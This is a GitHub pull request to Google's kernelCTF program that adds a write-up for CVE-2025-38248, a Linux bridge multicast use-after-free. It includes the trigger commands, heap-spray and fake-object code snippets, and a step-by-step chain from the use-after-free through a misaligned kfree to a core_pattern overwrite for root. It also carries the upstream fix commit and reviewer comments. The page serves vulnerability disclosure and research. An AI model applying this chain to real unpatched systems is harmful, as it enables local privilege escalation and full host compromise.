-
Notifications
You must be signed in to change notification settings - Fork 523
kernelctf: add CVE-2025-38248_cos #327
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
Varde7918
wants to merge
1
commit into
google:master
Choose a base branch
from
Varde7918:master
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from all commits
Commits
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
127 changes: 127 additions & 0 deletions
127
pocs/linux/kernelctf/CVE-2025-38248_cos/docs/exploit.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,127 @@ | ||
| # CVE-2025-38248 | ||
|
|
||
| ## Exploit Primitives | ||
|
|
||
| - **Vulnerable object**: `net_bridge_port` (`kmalloc-1k`) | ||
| - **Primitive chain**: UAF → controlled `hlist` write → `msg_msg->security` corruption → misaligned `kfree` → USMA privilege escalation | ||
|
|
||
| ## Vulnerability Overview | ||
|
|
||
| The root cause is that `br_multicast_port_ctx_deinit()` ([br_multicast.c:2014](../linux/net/bridge/br_multicast.c)) only cancels multicast router timers but does not remove the port from the global multicast router port lists (`ip4_mc_router_list` / `ip6_mc_router_list`): | ||
|
|
||
| ```c | ||
| void br_multicast_port_ctx_deinit(struct net_bridge_mcast_port *pmctx) | ||
| { | ||
| #if IS_ENABLED(CONFIG_IPV6) | ||
| del_timer_sync(&pmctx->ip6_mc_router_timer); | ||
| #endif | ||
| del_timer_sync(&pmctx->ip4_mc_router_timer); | ||
| // Missing: br_ip4_multicast_rport_del(pmctx) | ||
| // Missing: br_ip6_multicast_rport_del(pmctx) | ||
| } | ||
| ``` | ||
|
|
||
| This function is called during port deletion by `br_multicast_del_port()` ([br_multicast.c:2043](../linux/net/bridge/br_multicast.c)). Since it only cancels timers without cleaning up the `hlist` entries, deleting a port that is in permanent multicast router state (`mcast_router=2`) leaves a dangling pointer in the global router list. | ||
|
|
||
| Trigger sequence (corresponding to [exploit.c:829-849](../exploit/cos-121-18867.294.25/exploit.c)): | ||
|
|
||
| ```bash | ||
| # 1. Create a bridge with VLAN filtering and multicast snooping | ||
| ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 | ||
| # 2. Add a port | ||
| ip link add name dummy1 up master br1 type dummy | ||
| # 3. Set as permanent multicast router → ip4_rlist / ip6_rlist added to global router list | ||
| ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| # 4. Enable per-VLAN multicast snooping → disables base port context, ip4_rlist / ip6_rlist removed from list | ||
| ip link set dev br1 type bridge mcast_vlan_snooping 1 | ||
| # 5. Reset then re-set mcast_router | ||
| # Note: setting directly to 2 would be skipped due to the (pmctx->multicast_router == val) | ||
| # check in br_multicast_set_port_router(), so we must first set to 0 to change the value, | ||
| # then set to 2 to trigger re-addition | ||
| ip link set dev dummy1 type bridge_slave mcast_router 0 | ||
| ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| # 6. Delete port → br_multicast_port_ctx_deinit() only cancels timers, doesn't clean up list → UAF | ||
| ip link del dev dummy1 | ||
| ``` | ||
|
|
||
| ## Exploitation | ||
|
|
||
| ### 1. Leak and Heap Layout | ||
|
|
||
| Bypass KASLR using the [Entrybleed](https://www.willsroot.io/2022/12/entrybleed.html) prefetch side-channel ([exploit.c:299-455](../exploit/cos-121-18867.294.25/exploit.c)) to leak the kernel base (`leak_kernel_base`) and the direct mapping base (`leak_kheap_base`). | ||
|
|
||
| Then spray `msg_msg` objects (`kmalloc-cg-4k`) across 12 child processes (each with its own IPC namespace), totaling ~1.37 GB. Using the leaked heap base plus an empirical offset `0xa000000`, compute a target address `GUESSED_MSG_ADDR` that is highly likely to contain a `msg_msg` object. The subsequent write target is the `msg_msg->security` field (offset 40) at this address. | ||
|
|
||
| ### 2. Trigger UAF and Reclaim | ||
|
|
||
| The bridge maintains a global multicast router port list (`ip4_mc_router_list`) to ensure multicast packets are forwarded to ports behind multicast routers. Each port is linked into this list via `net_bridge_mcast_port.ip4_rlist` (an `hlist_node`). | ||
|
|
||
| After deleting `dummy1`, its `net_bridge_port` (`kmalloc-1k`) is freed, but the global router list still references its `multicast_ctx.ip4_rlist` and `multicast_ctx.ip6_rlist`. | ||
|
|
||
| Spray a crafted `net_bridge_port` object via netlink (`NETLINK_USERSOCK`) `sk_buff` to reclaim the freed memory ([exploit.c:852-856](../exploit/cos-121-18867.294.25/exploit.c)): | ||
|
|
||
| ```c | ||
| void craft_fake_net_bridge_port(void *fake, void* target_1, void* target_2) { | ||
| struct net_bridge_port *p = (struct net_bridge_port *)fake; | ||
| p->multicast_ctx.ip4_rlist.next = target_1 - 8; // write target 1 | ||
| p->multicast_ctx.ip6_rlist.next = target_2 - 8; // write target 2 (marker) | ||
| p->multicast_ctx.port = 0xffffffffffffffff; // pass null checks | ||
| } | ||
| ``` | ||
|
|
||
| The two write targets are: | ||
| - `target_1` = `&GUESSED_MSG_ADDR->security` (to overwrite `msg_msg->security`) | ||
| - `target_2` = `&GUESSED_MSG_ADDR->mtext[MARKER_OFFSET]` (to write a marker in the message data for victim identification) | ||
|
|
||
| ### 3. Controlled Write | ||
|
|
||
| Create `dummy2` and set `mcast_router=2` ([exploit.c:858-864](../exploit/cos-121-18867.294.25/exploit.c)), triggering `br_multicast_add_router()` ([br_multicast.c:3339](../linux/net/bridge/br_multicast.c)) to traverse the router list. When it encounters the dangling node (now occupied by our crafted data), the kernel calls `hlist_add_behind_rcu()` to insert `dummy2`'s node after it: | ||
|
|
||
| ```c | ||
| // include/linux/rculist.h:678 | ||
| static inline void hlist_add_behind_rcu(struct hlist_node *n, | ||
| struct hlist_node *prev) | ||
| { | ||
| n->next = prev->next; // [1] | ||
| WRITE_ONCE(n->pprev, &prev->next); | ||
| rcu_assign_pointer(hlist_next_rcu(prev), n); | ||
| if (n->next) | ||
| WRITE_ONCE(n->next->pprev, &n->next); // [2] | ||
| } | ||
| ``` | ||
|
|
||
| Here `prev` is the crafted node (occupying `dummy1`'s freed `ip4_rlist`), and `n` is `dummy2`'s `ip4_rlist`: | ||
|
|
||
| - `[1]`: We set `prev->next` to `&msg_msg->security - 8`, so `n->next = &msg_msg->security - 8` | ||
| - `[2]`: The address of `n->next->pprev` is `(&msg_msg->security - 8) + offsetof(hlist_node, pprev)` = `&msg_msg->security - 8 + 8` = `&msg_msg->security`. Thus `msg_msg->security` is overwritten with `&n->next`. | ||
|
|
||
| **Result**: `msg_msg->security = &dummy2->multicast_ctx.ip4_rlist.next`, i.e., `dummy2_base + 408`. | ||
|
|
||
| Similarly, the `ip6_rlist` write uses the same mechanism to write a non-zero value at `msg_msg->mtext[MARKER_OFFSET]`, serving as a marker to identify the victim. | ||
|
|
||
| ### 4. Locate Victim msg_msg | ||
|
|
||
| Child processes use the `MSG_COPY` flag to non-destructively read all messages, checking whether offset `MARKER_OFFSET` (0x100) contains a non-zero value ([exploit.c:543-559](../exploit/cos-121-18867.294.25/exploit.c)). The marker written by the `ip6_rlist` write pinpoints exactly which `msg_msg` was hit: | ||
|
|
||
| ```c | ||
| uint64_t *marker = &msgbuf.mtext[MARKER_OFFSET]; | ||
| if (*marker) { | ||
| shared->victim_msg_idx = msg_idx; | ||
| shared->victim_process = process_idx; | ||
| } | ||
| ``` | ||
|
|
||
| ### 5. Misaligned kfree and USMA Privilege Escalation | ||
|
|
||
| After deleting `dummy2`, reclaim its freed memory with `pg_vec` (`AF_PACKET` socket RX ring page pointer arrays, `kmalloc-1k`) ([exploit.c:872-877](../exploit/cos-121-18867.294.25/exploit.c)). | ||
|
|
||
| Then call `msgrcv` to receive the victim message. The kernel calls `kfree(msg->security)` when freeing the `msg_msg`: | ||
|
|
||
| - `msg->security` has been overwritten to `dummy2_base + 408` — this is not an object-aligned address, but a pointer at offset 408 within a `kmalloc-1k` object | ||
| - `kfree` does not validate whether the pointer is aligned to an object start; it places `dummy2_base + 408` directly onto the `kmalloc-1k` freelist | ||
| - Meanwhile, the `pg_vec` at `dummy2_base` is still actively referenced by a `packet_socket` | ||
|
|
||
| This is the core of the **misaligned kfree** technique: the next `kmalloc-1k` allocation returns `dummy2_base + 408`, so the newly allocated buffer starts from the middle of the live `pg_vec`. By spraying 616 bytes (= 1024 - 408, exactly covering the remainder of the object) of `core_pattern` page addresses via `sk_buff`, the latter half of the `pg_vec` entries (roughly from index 51 onward) are overwritten. | ||
|
|
||
| Finally, iterate over all `packet_socket`s and `mmap` their ring buffers ([exploit.c:646-667](../exploit/cos-121-18867.294.25/exploit.c)). The corrupted `pg_vec` entries cause the corresponding pages in the `mmap` region to map to the kernel page containing `core_pattern`. Overwrite `core_pattern` with `|/proc/%P/fd/666 %P`. A previously forked child process ([exploit.c:778-783](../exploit/cos-121-18867.294.25/exploit.c)) detects the overwrite and triggers a crash, causing the kernel to execute the exploit binary itself with root privileges to read the flag. | ||
|
|
147 changes: 147 additions & 0 deletions
147
pocs/linux/kernelctf/CVE-2025-38248_cos/docs/vulnerability.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,147 @@ | ||
| ##bridge: mcast: Fix use-after-free during router port configuration | ||
| [ Upstream commit 7544f3f5b0b58c396f374d060898b5939da31709 ] | ||
|
|
||
| The bridge maintains a global list of ports behind which a multicast | ||
| router resides. The list is consulted during forwarding to ensure | ||
| multicast packets are forwarded to these ports even if the ports are not | ||
| member in the matching MDB entry. | ||
|
|
||
| When per-VLAN multicast snooping is enabled, the per-port multicast | ||
| context is disabled on each port and the port is removed from the global | ||
| router port list: | ||
|
|
||
| # ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 | ||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Could you have another look at Markdown in the file? Right now "#" is interpreted like a header of the document. It's probably worth to use ``` block to enclose "bash" commands in it. |
||
| # ip link add name dummy1 up master br1 type dummy | ||
| # ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| $ bridge -d mdb show | grep router | ||
| router ports on br1: dummy1 | ||
| # ip link set dev br1 type bridge mcast_vlan_snooping 1 | ||
| $ bridge -d mdb show | grep router | ||
|
|
||
| However, the port can be re-added to the global list even when per-VLAN | ||
| multicast snooping is enabled: | ||
|
|
||
| # ip link set dev dummy1 type bridge_slave mcast_router 0 | ||
| # ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| $ bridge -d mdb show | grep router | ||
| router ports on br1: dummy1 | ||
|
|
||
| Since commit 4b30ae9adb04 ("net: bridge: mcast: re-implement | ||
| br_multicast_{enable, disable}_port functions"), when per-VLAN multicast | ||
| snooping is enabled, multicast disablement on a port will disable the | ||
| per-{port, VLAN} multicast contexts and not the per-port one. As a | ||
| result, a port will remain in the global router port list even after it | ||
| is deleted. This will lead to a use-after-free [1] when the list is | ||
| traversed (when adding a new port to the list, for example): | ||
|
|
||
| # ip link del dev dummy1 | ||
| # ip link add name dummy2 up master br1 type dummy | ||
| # ip link set dev dummy2 type bridge_slave mcast_router 2 | ||
|
|
||
| Similarly, stale entries can also be found in the per-VLAN router port | ||
| list. When per-VLAN multicast snooping is disabled, the per-{port, VLAN} | ||
| contexts are disabled on each port and the port is removed from the | ||
| per-VLAN router port list: | ||
|
|
||
| # ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 mcast_vlan_snooping 1 | ||
| # ip link add name dummy1 up master br1 type dummy | ||
| # bridge vlan add vid 2 dev dummy1 | ||
| # bridge vlan global set vid 2 dev br1 mcast_snooping 1 | ||
| # bridge vlan set vid 2 dev dummy1 mcast_router 2 | ||
| $ bridge vlan global show dev br1 vid 2 | grep router | ||
| router ports: dummy1 | ||
| # ip link set dev br1 type bridge mcast_vlan_snooping 0 | ||
| $ bridge vlan global show dev br1 vid 2 | grep router | ||
|
|
||
| However, the port can be re-added to the per-VLAN list even when | ||
| per-VLAN multicast snooping is disabled: | ||
|
|
||
| # bridge vlan set vid 2 dev dummy1 mcast_router 0 | ||
| # bridge vlan set vid 2 dev dummy1 mcast_router 2 | ||
| $ bridge vlan global show dev br1 vid 2 | grep router | ||
| router ports: dummy1 | ||
|
|
||
| When the VLAN is deleted from the port, the per-{port, VLAN} multicast | ||
| context will not be disabled since multicast snooping is not enabled | ||
| on the VLAN. As a result, the port will remain in the per-VLAN router | ||
| port list even after it is no longer member in the VLAN. This will lead | ||
| to a use-after-free [2] when the list is traversed (when adding a new | ||
| port to the list, for example): | ||
|
|
||
| # ip link add name dummy2 up master br1 type dummy | ||
| # bridge vlan add vid 2 dev dummy2 | ||
| # bridge vlan del vid 2 dev dummy1 | ||
| # bridge vlan set vid 2 dev dummy2 mcast_router 2 | ||
|
|
||
| Fix these issues by removing the port from the relevant (global or | ||
| per-VLAN) router port list in br_multicast_port_ctx_deinit(). The | ||
| function is invoked during port deletion with the per-port multicast | ||
| context and during VLAN deletion with the per-{port, VLAN} multicast | ||
| context. | ||
|
|
||
| Note that deleting the multicast router timer is not enough as it only | ||
| takes care of the temporary multicast router states (1 or 3) and not the | ||
| permanent one (2). | ||
|
|
||
| [1] | ||
| BUG: KASAN: slab-out-of-bounds in br_multicast_add_router.part.0+0x3f1/0x560 | ||
| Write of size 8 at addr ffff888004a67328 by task ip/384 | ||
| [...] | ||
| Call Trace: | ||
| <TASK> | ||
| dump_stack_lvl+0x6f/0xa0 | ||
| print_address_description.constprop.0+0x6f/0x350 | ||
| print_report+0x108/0x205 | ||
| kasan_report+0xdf/0x110 | ||
| br_multicast_add_router.part.0+0x3f1/0x560 | ||
| br_multicast_set_port_router+0x74e/0xac0 | ||
| br_setport+0xa55/0x1870 | ||
| br_port_slave_changelink+0x95/0x120 | ||
| __rtnl_newlink+0x5e8/0xa40 | ||
| rtnl_newlink+0x627/0xb00 | ||
| rtnetlink_rcv_msg+0x6fb/0xb70 | ||
| netlink_rcv_skb+0x11f/0x350 | ||
| netlink_unicast+0x426/0x710 | ||
| netlink_sendmsg+0x75a/0xc20 | ||
| __sock_sendmsg+0xc1/0x150 | ||
| ____sys_sendmsg+0x5aa/0x7b0 | ||
| ___sys_sendmsg+0xfc/0x180 | ||
| __sys_sendmsg+0x124/0x1c0 | ||
| do_syscall_64+0xbb/0x360 | ||
| entry_SYSCALL_64_after_hwframe+0x4b/0x53 | ||
|
|
||
| [2] | ||
| BUG: KASAN: slab-use-after-free in br_multicast_add_router.part.0+0x378/0x560 | ||
| Read of size 8 at addr ffff888009f00840 by task bridge/391 | ||
| [...] | ||
| Call Trace: | ||
| <TASK> | ||
| dump_stack_lvl+0x6f/0xa0 | ||
| print_address_description.constprop.0+0x6f/0x350 | ||
| print_report+0x108/0x205 | ||
| kasan_report+0xdf/0x110 | ||
| br_multicast_add_router.part.0+0x378/0x560 | ||
| br_multicast_set_port_router+0x6f9/0xac0 | ||
| br_vlan_process_options+0x8b6/0x1430 | ||
| br_vlan_rtm_process_one+0x605/0xa30 | ||
| br_vlan_rtm_process+0x396/0x4c0 | ||
| rtnetlink_rcv_msg+0x2f7/0xb70 | ||
| netlink_rcv_skb+0x11f/0x350 | ||
| netlink_unicast+0x426/0x710 | ||
| netlink_sendmsg+0x75a/0xc20 | ||
| __sock_sendmsg+0xc1/0x150 | ||
| ____sys_sendmsg+0x5aa/0x7b0 | ||
| ___sys_sendmsg+0xfc/0x180 | ||
| __sys_sendmsg+0x124/0x1c0 | ||
| do_syscall_64+0xbb/0x360 | ||
| entry_SYSCALL_64_after_hwframe+0x4b/0x53 | ||
|
|
||
| Fixes: 2796d846d74a ("net: bridge: vlan: convert mcast router global option to per-vlan entry") | ||
| Fixes: 4b30ae9adb04 ("net: bridge: mcast: re-implement br_multicast_{enable, disable}_port functions") | ||
| Reported-by: syzbot+7bfa4b72c6a5da128d32@syzkaller.appspotmail.com | ||
| Closes: https://lore.kernel.org/all/684c18bd.a00a0220.279073.000b.GAE@google.com/T/ | ||
| Signed-off-by: Ido Schimmel <idosch@nvidia.com> | ||
| Link: https://patch.msgid.link/20250619182228.1656906-1-idosch@nvidia.com | ||
| Signed-off-by: Jakub Kicinski <kuba@kernel.org> | ||
| Signed-off-by: Sasha Levin <sashal@kernel.org> | ||
|
|
||
13 changes: 13 additions & 0 deletions
13
pocs/linux/kernelctf/CVE-2025-38248_cos/exploit/cos-121-18867.294.25/Makefile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| CFLAGS = -static -pthread -s | ||
|
|
||
|
|
||
| exploit: exploit.c | ||
| $(CC) $(CFLAGS) -o $@ $< | ||
|
|
||
| exploit_debug: exploit.c | ||
| $(CC) $(CFLAGS) -o $@ $< -g | ||
|
|
||
| clean: | ||
| rm -f exploit | ||
|
|
||
| .PHONY: clean |
Binary file added
BIN
+794 KB
pocs/linux/kernelctf/CVE-2025-38248_cos/exploit/cos-121-18867.294.25/exploit
Binary file not shown.
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The file lacks important information, like what are the versions affected, what capabilities (if any) needed to exploit the vuln, what configurations should be enabled etc. Please, check other (already merged exploit PRs) to see the what the file should contain. For example, https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2025-37752_cos/docs/vulnerability.md